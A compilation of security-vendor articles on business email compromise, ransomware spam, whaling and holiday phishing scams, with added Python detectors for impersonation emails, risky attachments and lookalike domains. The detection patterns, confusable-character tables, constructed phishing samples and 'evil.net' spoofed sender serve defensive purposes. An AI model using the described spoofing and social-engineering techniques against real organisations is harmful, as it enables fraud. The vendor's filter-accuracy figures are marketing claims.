A business email compromise scam is a sophisticated attack in which scammers attempt to trick individuals into wiring funds from corporate accounts to bank accounts controlled by the attackers. Businesses most commonly targeted are those that frequently make foreign transfers to international companies. In the classic form, the attackers first gain access to the email account of the CEO or another high-level executive. An email is then sent from that account to an individual in the accounts department requesting that a bank transfer be made. Occasionally the scammer asks for checks to be sent, depending on which method the targeted organization most commonly uses to make payments.
A business email compromise scam does not necessarily require access to a corporate email account to be gained. Attackers can purchase an almost identical domain to that used by the targeted company. They then set up an email account in the name of the CEO using the same format as that used by the company. This can be enough to fool accounts department workers into making the transfer. Business email compromise scams use a variety of social engineering techniques to convince the targeted accounts department employee to make the transfer.
Business Email Compromise Scams are a Growing Problem
The FBI has previously warned businesses of the growing risk of business email compromise scams. In April this year, the FBI Phoenix Office issued a warning about a dramatic rise in BEC attacks. The data showed that between October 2013 and February 2016 there had been at least 17,642 victims of BEC attacks in the United States, and the losses had reached $2.3 billion.
New data from the FBI suggest that the problem is far worse. The FBI has now incorporated business email compromise scam data from the Internet Crime Complaint Center (IC3). 22,143 reports have now been received from business email compromise scam victims, which correspond to losses of $3,086,250,090.
Between October 2013 and May 2016, there have been 15,668 domestic and international victims, and losses of $1,053,849,635 have been reported. In the U.S. alone, there have been 14,032 victims. Since January 2015, there has been a 1,300% increase in losses as a result of BEC attacks. The majority of the funds have been wired to Asian bank accounts in China and Hong Kong.
The FBI warns of five scenarios that are used by criminals to commit fraud using BEC scams:
- Requests for W-2s or PII from the HR department – The data are used to file fraudulent tax returns in the names of employees
- Requests from foreign suppliers to wire money to new accounts – Attackers discover the name of a regular foreign supplier and send an email request for payment, including new bank details (their own).
- Request from the CEO for a new transfer – The CEO’s (or other executive) email account is compromised and a request for a new bank transfer is sent to an individual in the accounts department who is responsible for making bank transfers
- A personal email account of an employee of a business is compromised – That account is used to send payment requests to multiple vendors who have been identified from the employee’s contact list
- Impersonation of an attorney – Emails are sent from attackers claiming to be attorneys, or representatives of law firms, requesting urgent transfers of funds to pay for time-sensitive matters
To protect against BEC attacks, businesses are advised to require a second, out-of-band verification step for all business bank transfers (for example a telephone call to a number already on file, or two-factor authentication on the banking platform), in particular for payments sent overseas. Organizations should treat any bank transfer request with suspicion if it arrives by email and pressure is placed on an individual to act quickly and make the transfer.
The FBI recommends that businesses never use free web-based email accounts for business purposes. Organizations should also be careful about the information posted to social media accounts, in particular company information, job descriptions and duties, out of office details, and hierarchical information about the company.
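As an added example (not from the FBI's announcement or the original articles), the following Python code brings together the checks that the W-2 scam described earlier on this page and the BEC scenarios above call for: it compares the display name on a message with a directory of executives, detects lookalike domains by folding common character substitutions and measuring edit distance against the organization's own domain, flags free webmail senders and diverted Reply-To headers, and looks for the payroll-data and payment wording that should always trigger a telephone call-back. The organization domain, the executive directory and the three sample messages are constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed organization data for the example (assumptions, not from the FBI or the original articles)
COMPANY_DOMAIN = "example-school.org"
EXECUTIVES = {"jane doe": "jane.doe@example-school.org", "sam roe": "sam.roe@example-school.org"}
FREE_WEBMAIL = {"gmail.com", "yahoo.com", "aol.com", "outlook.com", "hotmail.com"}
REQUEST_WORDS = re.compile(r"\b(w-?2s?|wire transfer|wire|urgent|confidential|bank details|new account|gift cards?)\b", re.I)
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def edit_distance(a, b):
    """Levenshtein distance in the standard dynamic-programming form."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + (ca != cb)))
        previous = current
    return previous[-1]


def normalize(domain):
    """Fold the substitutions attackers rely on, so that 'exarnple' compares equal to 'example'."""
    d = domain.lower()
    for fake, real in CONFUSABLES:
        d = d.replace(fake, real)
    return d


def is_lookalike(domain, trusted=COMPANY_DOMAIN):
    if domain == trusted:
        return False
    d, t = normalize(domain), normalize(trusted)
    return d == t or edit_distance(d, t) <= 2 or trusted.split(".")[0] in d.split(".")[0]


def plain_text(msg):
    parts = msg.walk() if msg.is_multipart() else [msg]
    texts = []
    for part in parts:
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            texts.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(texts)


def analyze(raw):
    """List the reasons a message looks like an executive-impersonation (BEC or W-2) request."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    domain = addr.rpartition("@")[2].lower()
    findings = []
    expected = EXECUTIVES.get(name.strip().lower())
    if expected and addr.lower() != expected:
        findings.append(f"display name '{name}' belongs to {expected}, not {addr}")
    if is_lookalike(domain):
        findings.append(f"lookalike domain: {domain}")
    if domain in FREE_WEBMAIL:
        findings.append(f"free webmail sender: {domain}")
    if reply_to and reply_to.rpartition("@")[2].lower() != domain:
        findings.append(f"Reply-To diverted to {reply_to}")
    if REQUEST_WORDS.search(msg.get("Subject", "") + "\n" + plain_text(msg)):
        findings.append("asks for payroll data or a payment")
    return findings


def triage(raw):
    """Policy: every data or payment request is verified by telephone; impersonation signs escalate it."""
    findings = analyze(raw)
    request = any(f.startswith("asks for") for f in findings)
    impersonation = len(findings) > int(request)
    if request and impersonation:
        return "quarantine"
    if request:
        return "verify by phone"
    return "warn recipient" if impersonation else "deliver"


# Constructed sample messages (not real correspondence)
SAMPLE_W2 = """From: Jane Doe <jane.doe@exarnple-school.org>
Reply-To: jane.doe@exarnple-school.org
To: payroll@example-school.org
Subject: W-2 forms - urgent

Can you send me the W-2s of all staff as a PDF today? I am in meetings, so email only please.
"""
SAMPLE_WEBMAIL = """From: Sam Roe <samroe.finance@gmail.com>
To: accounts@example-school.org
Subject: Quick request

I need a wire transfer to a new account processed before noon. Call me only after it is done.
"""
SAMPLE_LEGIT = """From: Jane Doe <jane.doe@example-school.org>
To: payroll@example-school.org
Subject: Board meeting agenda

The agenda for Tuesday is attached.
"""

if __name__ == "__main__":
    for sample in (SAMPLE_W2, SAMPLE_WEBMAIL, SAMPLE_LEGIT):
        print(triage(sample), analyze(sample))
```

Note that a genuine request from the real superintendent still comes back as "verify by phone": the call-back policy applies to every request for W-2 data or a payment, not only to the ones that look wrong, because a compromised internal account produces a message that passes every header check.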
A new report by anti-phishing training company PhishMe shows a marked rise in the volume of ransomware emails in March. The report shows that spam emails are now predominantly being used to deliver ransomware to unsuspecting victims. The spike in ransomware emails highlights how important it is to conduct anti-phishing training and to use anti-spam solutions to prevent the malicious file-encrypting software from being delivered to employee’s inboxes.
Spike in Ransomware Emails as Criminals Seek Easy Cash
Ransomware has been around for about a decade, yet it has not been favored by cybercriminals until recently. Throughout 2015, under 10% of phishing emails were being used to transmit ransomware. However, in December there was a major spike in ransomware emails, which accounted for 56% of all phishing emails in December. The upward trend has continued in 2016 and by March, 93% of phishing emails contained ransomware – or were used to infect users by directing them to malicious websites where drive-by downloads of the malicious software occurred.
Spam email volume has been in general decline, due in no small part to the shutting down of major botnets in recent years. However, that does not mean that the threat of cyberattacks via email can be ignored. In fact, PhishMe’s figures show there has been a surge in the number of phishing emails being sent. In the first quarter of 2016, the number of detected phishing emails soared to 6.3 million, which represents a 789% increase from the volume captured in the last quarter of 2015.
Ransomware is increasingly being used by cybercriminals for a number of reasons. Ransomware is now easy to obtain and send out. Many ransomware authors offer ransomware-as-a-service to any criminal looking to make a quick buck. Not only can the ransomware be hired for next to nothing, instructions are supplied on how to use it and criminals are allowed to set their own ransoms and timescales for payment. All they need to do is pay a percentage of the ransoms they obtain to the authors.
What makes the use of ransomware even more attractive is the speed at which criminals can get paid. Time limits for paying ransoms are usually very short. Demands for payment within 48 hours are not uncommon. While phishing emails have commonly been used to obtain credit card details from victims, which then need to be sold on, criminals can run a ransomware campaign and rake in Bitcoin payments in just a few days.
The ransoms being demanded are also relatively low. This means that many individuals can afford to pay to obtain the decryption keys that unlock their files, and businesses are also likely to pay: the cost of recovering data and restoring systems, together with the revenue lost while computer systems are down, is often greater than the ransom being demanded.
Ransomware Is Becoming Much More Sophisticated
The latest forms of ransomware now being used (Locky, CryptXXX, TeslaCrypt, and Samas, also known as SamSam) do not stop at a single computer. Files on mapped network drives and file servers, on portable storage devices, and on connected backup drives are encrypted as well, and some variants are used to infect other machines on the network. Some forms also delete Windows shadow copies, preventing the restoration of files from those local snapshots.
All that the criminals need is for one business computer to be infected in order to encrypt files throughout the network. That means only one end user needs to be fooled into opening an infected attachment or visiting a malicious webpage.
Ransomware emails often contain personal information to increase the likelihood of an individual clicking a malicious link or opening an infected attachment. Word files are now commonly being used to infect users. Embedded macros contain code that downloads the malicious payload.
The malicious software is sent out in spear phishing campaigns targeting one or two users in a company, such as accounts and billing department executives. Personal information is often used in the emails – names, addresses, and job titles for example – to increase the likelihood of attachments being opened and links being clicked.
As criminals get better at crafting phishing emails and the ransomware becomes more sophisticated, it is more important than ever to use anti-spam solutions such as SpamTitan to trap ransomware emails and prevent them from being delivered. SpamTitan traps 99.9% of spam emails, helping organizations protect their networks from ransomware attacks.
According to a recent report on spam email from anti-virus software developer Kaspersky Lab, the decline in spam email over the past few years appears to have reversed, with the first quarter of 2016 seeing a major increase in malicious spam email volume.
Major Increase in Malicious Spam Email Volume Reported by Kaspersky Lab
Over the past few years there has been a decline in the number of spam emails, as cybercriminals have sought other ways to deliver malware and defraud computer users. In 2015, the volume of spam emails being sent fell to a 12-year low. Spam's share of all email fell below 50% for the first time since 2003.
In June 2015, spam's share of email dropped to 49.7% and in July 2015 the figure fell further still to 46.4%, according to anti-virus software developer Symantec. The decline was attributed to the taking down of major botnets responsible for sending spam emails in the billions.
Malicious spam email volume remained fairly constant during 2015. Between 3 million and 6 million malicious spam emails were detected by Kaspersky Lab throughout 2015; however, toward the end of the year, malicious spam email volume increased. That trend has continued in 2016.
Wide Range of Malicious Files Being Sent in Spam Email
While it was common for virus-loaded executable files to be sent as email attachments, these are now commonly caught by email filters and are marked as spam. However, spammers have been developing new methods of getting past traditional webmail spam filters. The spam emails intercepted by Kaspersky Lab now contain a wide variety of malicious files.
One of the most common methods now used by spammers is to send office documents infected with malicious macros. Microsoft Word files with the extension DOC and DOCX are commonly used, as are rich text format files RTF, Adobe PDF files, and Microsoft Excel spreadsheets with the extensions XLS and XLSX.
These file formats are commonly opened as many end users are less suspicious of office documents than they are of ZIP, RAR, and EXE files. Most office workers would know not to open an EXE file that was emailed to them by a stranger, yet an office document – a file format they use on a daily basis – is less likely to arouse suspicion.
Instead of the emails containing the actual malware, virus, or ransomware payload, they contain Trojan downloaders that download JS scripts. Those scripts then perform the final stage of infection and download the actual malware or ransomware. This method of attack is used to bypass anti-virus protections.
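An attachment triage routine covering the file types this report lists (office documents carrying macros, JS downloaders inside archives, PDFs with active content, and executables hiding behind another extension), added here as an example and not code from Kaspersky Lab or SpamTitan. The sample attachments and their names are constructed in memory, and the macro check on legacy OLE files is a byte-level heuristic rather than a full parser.

```python
import io
import zipfile
from dataclasses import dataclass, field

# Extensions Windows executes directly or hands to a script host; a .scr
# "screensaver" is a renamed PE executable, .js/.vbs/.lnk/.ps1 are downloader stages.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta", "lnk", "ps1"}
OOXML_EXTS = {"docx", "docm", "dotm", "xlsx", "xlsm", "xltm", "pptx", "pptm"}
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy DOC/XLS/PPT container
# OLE directory names are UTF-16LE, so a VBA project stream leaves this marker in
# the raw bytes (heuristic; a real parser such as oletools is more reliable).
VBA_STREAM_MARKER = "_VBA_PROJECT".encode("utf-16-le")
RISK_ORDER = {"low": 0, "medium": 1, "high": 2}

@dataclass
class Verdict:
    filename: str
    risk: str = "low"
    reasons: list = field(default_factory=list)

    def flag(self, level: str, why: str) -> None:
        if RISK_ORDER[level] > RISK_ORDER[self.risk]:
            self.risk = level
        self.reasons.append(why)

def _extensions(filename: str) -> list:
    """All dotted suffixes, lowercased: 'invoice.pdf.exe' -> ['pdf', 'exe']."""
    return [p for p in filename.lower().split(".")[1:] if p]

def _inspect_zip(v: Verdict, data: bytes, final_ext: str, depth: int) -> None:
    """OOXML documents and plain archives are both ZIP files; tell them apart."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                v.flag("high", "Office document containing a VBA macro project")
            elif final_ext in OOXML_EXTS or "[Content_Types].xml" in names:
                return                      # macro-free OOXML document
            elif depth < 1:                 # plain archive: triage each member once
                for n in names:
                    inner = triage_attachment(n, zf.read(n), depth + 1)
                    if inner.risk != "low":
                        v.flag(inner.risk, f"member {n}: " + "; ".join(inner.reasons))
    except zipfile.BadZipFile:
        v.flag("medium", "ZIP container that does not parse")

def triage_attachment(filename: str, data: bytes, depth: int = 0) -> Verdict:
    """Score one attachment from its name and its content. Content checks run
    regardless of the extension, which is what catches renamed executables."""
    v = Verdict(filename)
    exts = _extensions(filename)
    final_ext = exts[-1] if exts else ""
    if final_ext in EXECUTABLE_EXTS:
        v.flag("high", f"executable or script extension .{final_ext}")
        if len(exts) >= 2:
            v.flag("high", f"double extension hides .{final_ext} behind .{exts[-2]}")
    if data.startswith(b"MZ"):
        v.flag("high", "Windows PE executable header, whatever the name says")
    elif data.startswith(OLE_MAGIC):
        if VBA_STREAM_MARKER in data:
            v.flag("high", "legacy Office document with a VBA project stream")
        else:
            v.flag("medium", "legacy Office (OLE) document")
    elif data.startswith(b"%PDF") and (b"/JavaScript" in data or b"/Launch" in data):
        v.flag("high", "PDF with JavaScript or a Launch action")
    elif data.startswith(b"PK\x03\x04"):
        _inspect_zip(v, data, final_ext, depth)
    return v

def build_samples() -> dict:
    """Constructed attachments, assembled in memory so the example runs offline."""
    def ooxml(with_macro: bool) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("[Content_Types].xml", "<Types/>")
            zf.writestr("word/document.xml", "<w:document/>")
            if with_macro:
                zf.writestr("word/vbaProject.bin", b"stand-in for a VBA project")
        return buf.getvalue()

    def archive(member: str, content: bytes) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(member, content)
        return buf.getvalue()

    fake_pe = b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode."
    return {
        "Invoice_4471.docm": ooxml(True),
        "Agenda.docx": ooxml(False),
        "Christmas_card.jpg.scr": fake_pe,            # masked executable
        "Statement.zip": archive("Statement_2015.js", b"// stand-in for a JS downloader"),
        "Quote.pdf": b"%PDF-1.4\n1 0 obj << /OpenAction << /S /JavaScript /JS (stand-in) >> >>",
        "Photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
    }
```

Running `triage_attachment(name, blob)` over `build_samples().items()` rates everything but `Agenda.docx` and `Photo.jpg` as high; in a mail gateway the high verdicts would go to quarantine or a sandbox rather than the inbox.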
Web Filters and Email Spam Filters Should be Used to Reduce the Risk of a Malware Infection
There has been an increase in drive-by downloads in recent years as attackers have lured victims to websites containing exploit kits that probe for vulnerabilities in browsers and browser plugins. Visitors are redirected to these malicious websites via compromised webpages, malvertising, and malicious social media posts. While drive-by downloads are still a major threat, the use of web filters and anti-virus browser add-ons is blocking many of these malware downloads and malicious websites.
Email is still a highly effective way of getting past security defenses and getting end users to install malware on their devices. Carefully crafted emails that include unique text increase the likelihood of the scammers getting users to open malicious attachments. Oftentimes, the messages include personal information about the recipient such as their name or address. This has helped the spammers to get the victims to take the desired action and run malicious macros and install malware.
It may be too early to tell whether spam email volume has only temporarily spiked or if there is a reversal in the decline of spam, but organizations and individuals should remain vigilant. The increase in malicious spam email volume should not be ignored.
Staff members should receive regular training on how to identify malicious email messages and phishing scams. It is also a wise precaution to use a robust spam filter such as SpamTitan. SpamTitan blocks 99.97% of malicious spam email messages, dramatically reducing the probability of malware, ransomware, adware, and spyware being installed.
Scammers are constantly coming up with crafty ways to fool computer users into revealing login credentials and installing malware, with the latest speeding ticket email scam being used for the latter. Emails are being sent to individuals claiming they have been caught driving too fast and are sent a link to click to pay their speeding ticket.
If the targeted individual clicks on the link contained in the spam email they will be directed to a malicious website that will download malware onto their computer.
This particular scam has been used to target drivers in Philadelphia. While the majority of spam emails are sent out randomly in the millions in the hope of fooling some individuals into clicking on malicious links, this particular campaign is anything but random. Individuals are being targeted who are known to have exceeded the speed limit.
Not only have the attackers obtained the email addresses of their targets, they have also sent details of where the individual exceeded the speed limit. So how is this possible?
This particular speeding ticket email scam is understood to have been made possible by the attackers hacking a smartphone app that has access to the GPS on the phone. The attackers use location data and the phone's GPS to determine which individuals have exceeded the speed limit. Those individuals are then sent a speeding ticket scam email telling them to click on a link where they can see details of their vehicle license plate in the location where the infraction took place. They are also informed of the speed limit in that location together with the speed at which they were travelling. The speeding driver is told he or she has 5 days to pay the citation.
While this speeding ticket email scam could easily be used by the attackers to obtain credit card details or phish for other information, it appears to only be used to install malware. Clicking on the link in the email to view license plate details does not actually reveal the image. It silently installs malware.
The police department in Tredyffrin, PA, where drivers were targeted with this speeding ticket email scam, has not cited callers for their speeding violations when they have called to query the fine, even when they have confessed to speeding over the phone.
How to Protect Yourself Against Email Scams
This speeding ticket email scam is particularly convincing as it uses real data to fool users into clicking on the malicious link. Many spam email campaigns now use personal information – such as real names and addresses – to fool targets into opening infected email attachments or clicking on malicious links. This type of targeted spear phishing email is now all too common.
To protect against attacks such as this, there are a number of steps that should be taken.
- If contacted by email and asked to click a link, pay a fine, or open an attachment, assume it is a scam. Try to contact the individual or company to confirm, but do not use the contact information in the email. Perform a search on Google to obtain the correct telephone number to call.
- Carefully check the sender’s email. Does it look like it is genuine?
- Never open email attachments from someone you do not know.
- If you receive an email offering you a prize or refund, stay safe and delete the email.
- Ensure that anti-virus software is installed on your computer and is up to date.
Businesses have been put on alert following the discovery of a new personalized phishing scam that attempts to trick users into installing malware on their company’s computers. These new personalized phishing scam emails are primarily being used to spread CryptoWall ransomware, although that is far from the only payload delivered.
New Personalized Phishing Scam Delivers Wide Range of Malware
The new scam is also being used to deliver the Arsnif/RecoLoad POS reconnaissance Trojan to organizations in the retail and hospitality industries, as well as the Ursnif ISFB banking Trojan.
The current attack does not target all employees. Instead it is used to try to install malware on the computers of users with elevated network privileges such as senior executives, CFO’s, senior vice presidents, CEO’s, heads of finance, and company directors. These individuals not only have access to a far greater range of data, they are also likely to have access to corporate bank accounts.
If the payload is delivered it can result in POS systems being infected, access to bank accounts being gained, as well as widespread data encryption with ransomware. One single email could cause a considerable amount of damage. The emails are currently being used to target organizations in the financial services sector, although the retail, manufacturing, healthcare, education, business services, technology, insurance, and energy sectors have also received large volumes of these emails.
What makes this particular phishing campaign stand out is the fact that the emails have not been delivered to random individuals. Many spammers send out phishing emails in the millions in the hope that some individuals will respond. However, this is a personalized phishing scam targeting specific individuals. Those individuals have been researched and the emails include data specific to the target.
Each email refers to the recipient by name and includes their job title, address, and phone number in the body of the email. The subject is specific, the email crafted for a particular industry, and the attached files and links have been named to make them appear genuine. The emails have also been well written and do not contain the spelling and grammar mistakes typical of spam email.
A personalized phishing scam such as this is not usually conducted on such a large scale. Spear phishing emails are usually sent to just a handful of individuals, but this personalized phishing scam is being sent to many thousands of people, in particular those in the United States, United Kingdom, and Australia.
The data used in the email body could have been harvested from a social media site such as LinkedIn, although the scale of the attack suggests data has been obtained from elsewhere, such as a previous cyberattack on another company such as a supplier or an Internet site. Companies that do not use a robust spam filter such as SpamTitan are particularly at risk.
If you work in the accounting department of your company, you need to be more vigilant as cybercriminals are specifically targeting account department executives. Whaling attacks are on the increase and cybercriminals are using domain spoofing techniques to fool end users into making bank transfers from corporate accounts. Once money has been transferred into the account of the attacker, there is a strong probability that the funds will not be recoverable.
Whaling, as you may suspect, is a form of phishing. Rather than cybercriminals sending out large volumes of spam emails containing malware or links to malicious websites, individuals are targeted and few emails are sent. Cybercriminals are putting a lot of time and effort into researching their targets before launching their attack.
The aim is to gather intel on an individual that has the authorization to make bank transfers from company accounts. Individuals are usually identified and researched using social media websites such as Twitter, LinkedIn, and Facebook.
When individuals are identified and the name and email address of their boss, CFO, or CEO is discovered, they are sent an email requesting a bank transfer be made. The email is well written, there is a pressing need for the transfer to be made, and full details are provided in the email. They are also given a reasonable explanation as to why the transfer must be made. The email also comes from senior management.
In the majority of cases, the transfer request will not follow standard company procedures as these are not known by the attackers. However, since an email will appear to have been sent from a senior figure in the company, some account department employees will not question the request. They will do as instructed out of fear of the individual in question, or in an attempt to show willingness to do what is required of them by their superiors.
Unfortunately for IT security professionals, whaling emails are difficult to detect without an advanced spam filtering solution in place. No attachments are included in the email, there are no malicious links, just a set of instructions. The attack just uses social engineering techniques to fool end users into making the transfer.
What is Domain Spoofing?
The whaling attacks are often successful, as users are fooled by a technique called domain spoofing. Domain spoofing involves the creation of an email account using a domain that is very similar to that used by the company. Provided the attacker can get the correct format for the email, and has the name of a high-level account executive, at first glance the email address will appear to be correct.
However, closer inspection will reveal that one character in the domain name is different. Typically, an i will be replaced with an L or a 1, an o with a zero, or a Cyrillic character may be used that displays exactly like a standard Latin letter. If the recipient glances at the email address, they may not notice the small change.
To reduce the risk of account department employees falling for whaling attacks, anti-spam solutions should be implemented and configured to block emails from similar domains. Staff must also be told not to make any transfer requests that arrive via email without first double checking with the sender of the email that the request is genuine, and to always carefully check the email address of the sender of such a request.
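A lookalike-domain check of the kind such a filter would apply to the sender address, added here as an example and not SpamTitan's own logic. It collapses the substitutions described above (1 or i for l, 0 for o, Cyrillic letters for their Latin twins, rn for m) into a visual skeleton before comparing against the protected domain; example.com is a placeholder for the corporate domain and the sender addresses are constructed.

```python
import re
import unicodedata

# Substitutions the text describes (i/l/1, o/0) plus Cyrillic letters whose glyphs
# are indistinguishable from Latin ones. Extend from the Unicode confusables list.
CONFUSABLES = {
    "0": "o", "1": "l", "i": "l", "|": "l",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "l", "\u0458": "j",
}
PAIRS = {"rn": "m", "vv": "w"}          # two glyphs that read as one letter

def skeleton(domain: str) -> str:
    """Reduce a domain to what a reader sees, so look-alikes collapse together."""
    d = unicodedata.normalize("NFKC", domain.strip().lower().rstrip("."))
    d = "".join(CONFUSABLES.get(ch, ch) for ch in d)
    for pair, single in PAIRS.items():
        d = d.replace(pair, single)
    return d

def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; catches one-character changes such as example.co/.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def sender_domain(header_from: str) -> str:
    """Domain of the address the mail is actually routed on: the part inside <...>.
    A display name in front of it can itself be made to look like an address."""
    m = re.search(r"<([^<>]*)>\s*$", header_from)
    addr = m.group(1) if m else header_from
    if "@" not in addr:
        return ""
    return addr.rsplit("@", 1)[1].strip().lower().rstrip(".")

def classify_sender(header_from: str, trusted: set, max_distance: int = 1) -> dict:
    """internal: one of our domains; lookalike: confusable with one; external: other."""
    domain = sender_domain(header_from)
    result = {"domain": domain, "verdict": "external", "reason": ""}
    if not domain:
        result.update(verdict="reject", reason="no parseable address in From")
        return result
    trusted = {t.lower() for t in trusted}
    for t in trusted:
        if domain == t or domain.endswith("." + t):
            result.update(verdict="internal", reason=f"matches {t}")
            return result
    try:                                    # wire form of an internationalized domain
        wire = domain.encode("idna").decode("ascii")
    except UnicodeError:
        wire = domain
    for t in trusted:
        if skeleton(domain) == skeleton(t):
            result.update(verdict="lookalike", reason=f"confusable with {t} (wire form {wire})")
            return result
        dist = levenshtein(skeleton(domain), skeleton(t))
        if dist <= max_distance:
            result.update(verdict="lookalike", reason=f"edit distance {dist} from {t}")
            return result
    return result

if __name__ == "__main__":
    # Constructed senders checked against a placeholder corporate domain
    for sender in ["CEO <ceo@examp1e.com>", "CFO <cfo@exampl\u0435.com>",
                   "fin@exarnple.com", "ceo@example.co", "ceo@example.com <x@evil.net>",
                   "Alice <alice@example.com>", "news@totally-different.org"]:
        print(classify_sender(sender, {"example.com"}))
```

A gateway would quarantine or tag `lookalike` verdicts and let `external` mail through to the usual checks; a very short protected domain needs `max_distance` of 0 to avoid false positives.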
‘Tis the season to be jolly, but it is also the season for holiday email spam. Malware infections increase during holiday periods and this year is unlikely to be any different. Holiday email spam is coming, and it doesn’t matter whether you’ve been naughty or nice. If you do not take precautions, you are likely to receive a gift of malware this Christmastime.
Holiday email scams are sent in the billions at this time of year because of one simple fact: They work. People let their hair down over Christmas and New Year, but they also let their guard down. That gives online criminals an opportunity to get malware installed, fool consumers with phishing campaigns, and generally cause some festive mayhem.
Holiday email spam is now being sent: Avoid the Christmas rush and get your malware now!
Christmas week may see many people infected with malware, but the run up to Christmas can be even worse. As soon as the first decorations go up in the shops, holiday email spam starts to be sent. Email is commonly used to send malware.
Nasty malicious programs are masked as Christmas screensavers, phishing campaigns will appear as festive quizzes, and you can expect an African prince to need your assistance with a huge bank transfer. Don’t be surprised to find out that you have won a Sweepstake in a country you have never visited or that one of your online accounts will be hacked requiring you to receive technical support.
These and many more scams will be delivered in a wave of holiday email spam and, if you let your guard down, you may inadvertently fall for one of these often cleverly devised scams. Some of the latest phishing scams are incredibly convincing, and you may not even realize you have fallen for the scam and have become a victim.
Employers Beware: End users are especially gullible at this time of year
Everyone must be wary at this time of year due to the huge increase in spam email campaigns. Employers especially must take care as employees can be particularly gullible at this time of year. Their minds are on other things, and they are not as diligent and security conscious as they may usually be.
To make matters worse, each year the scammers get better and holiday email spam becomes more believable. If one of your employees falls for a holiday email spam attack, it may not only be their own bank account that gets emptied. Phishing campaigns are devised to get employees to reveal critical business data or login credentials. The FBI has warned that business email is being targeted. In the past two years over 7,000 U.S. firms have been targeted and have suffered from criminal attacks. Those attacks initially target employees, and the festive season is an ideal time for a business email compromise (BEC) attack to take place.
Common Holiday Email Spam Campaigns in 2015
Send an email bulletin to your employees highlighting the risk that holiday email spam poses, and warn them that they may shortly start receiving phishing emails and other spam campaigns. They are likely to have forgotten how risky the festive season can be.
Business Email Compromise (BEC) Attacks
The FBI has already released a warning this year to organizations that perform wire transfers on a regular basis and/or work with foreign suppliers. They are being targeted by cybercriminals using sophisticated scams that start with the compromising of a business email account. Social engineering and phishing tactics are used to get employees to reveal their login credentials. Once access to bank accounts has been obtained by criminals, fraudulent transfers are made. Holiday email spam campaigns are expected to be sent targeting organizations and specific employees within those organizations. During the holiday period employees must be told to be ultra-cautious.
Holiday e-card scams
Holiday e-card scams are common at Christmastime. Criminals take advantage of the growing popularity of e-cards and send out spam emails in the millions telling the recipient to click a link to download their e-card. However, those links are sent to convince users to download malware to their computers. Any email containing a file attachment claiming to be an e-card is likely to be fake. The attachment may be malware.
Christmas and other holiday-themed screensavers are commonly downloaded by employees. These screensavers can be fun and festive, but may actually be malicious. Employers should consider implementing a ban on the downloading of screensavers as a precaution. Staff members should be warned that any .scr file sent in an email should be treated with suspicion and not downloaded or installed. Criminals mask attachments and the .scr file may actually be an executable file that installs malware.
Ashley Madison revelations and TalkTalk scams
A number of major data breaches have been suffered this year that have resulted in customer data being exposed. Criminals are threatening to expose personal data, especially in the case of Ashley Madison clients. Emails are sent threatening breach victims, informing them that they must pay not to have their data posted on the internet. Some criminals will be in possession of the data; other scams will be speculative. If an email is received, it is essential that professional advice is sought before any action is taken.
If you receive an email asking you to take action to secure your account after a company you use has suffered a data breach – TalkTalk for example – it is essential to only change your password via the official website. Do not click on links contained in emails. They may be phishing scams.
Free Star Wars tickets
You can guarantee that such a major event for moviegoers will be the subject of multiple email spam campaigns. Criminals would not pass up the opportunity to take advantage of the release of a new Star Wars film.
There are likely to be competitions aplenty, free tickets offered, and many other Star Wars spam campaigns in the run up to the release. This is the biggest movie release of the year for many people. Fans of the films are excited. They want to see snippets of the film, read gossip, and find out if Luke Skywalker will actually be in the new film. Many people are likely to fall for scams and click phishing links or inadvertently install malware.
Get prepared this holiday season and you can keep your computer and network spam and malware free. Fail to take action and this holiday time is unlikely to be jolly. Quite the opposite in fact.
Criminals are increasingly using ransomware – Chimera ransomware for example – to extort victims. Ransomware encrypts certain file types with a powerful algorithm that cannot be unlocked without a security key. Unfortunately, the only person to hold that key is the hacker responsible for the ransomware infection.
Organizations and individuals that perform regular data backups can avoid paying the ransom demands and not face losing important files. If files are encrypted, they can be recovered from backups – provided of course that regular backups of critical data have been performed. Worst case scenario: Some data may be lost, but not a sufficient amount to warrant a ransom being paid.
Criminals are aware of this failsafe and have recently started to up the stakes. The criminals behind Chimera ransomware have been found to be using a new tactic to scare victims into giving into their demands. Even if a backup file has been made, victims can be easily convinced to pay the ransom. They are told that if the ransom is not paid, the files will be made public. Confidential information will be posted on darknet sites or listed for sale in online marketplaces.
Criminals Target Businesses and Encrypt Critical Files Using Chimera Ransomware
Hackers are known to send ransomware out randomly: the more computers that are infected, the more ransoms can be collected. Chimera ransomware, on the other hand, is being used more selectively, and small to medium sized businesses are being targeted. This stands to reason. An individual may not be willing, or able, to pay a ransom. Businesses are different. They may have no choice but to pay to have files unlocked. If data are posted online, the potential cost to the business could be far higher than the cost of the ransom.
How are computers infected with Chimera ransomware?
Spam emails are sent to specific individuals within an organization. Those emails contain innocent looking email attachments: the types of files that would commonly be received by the individuals being targeted. Business offers are sent, applications for employment, or invoices.
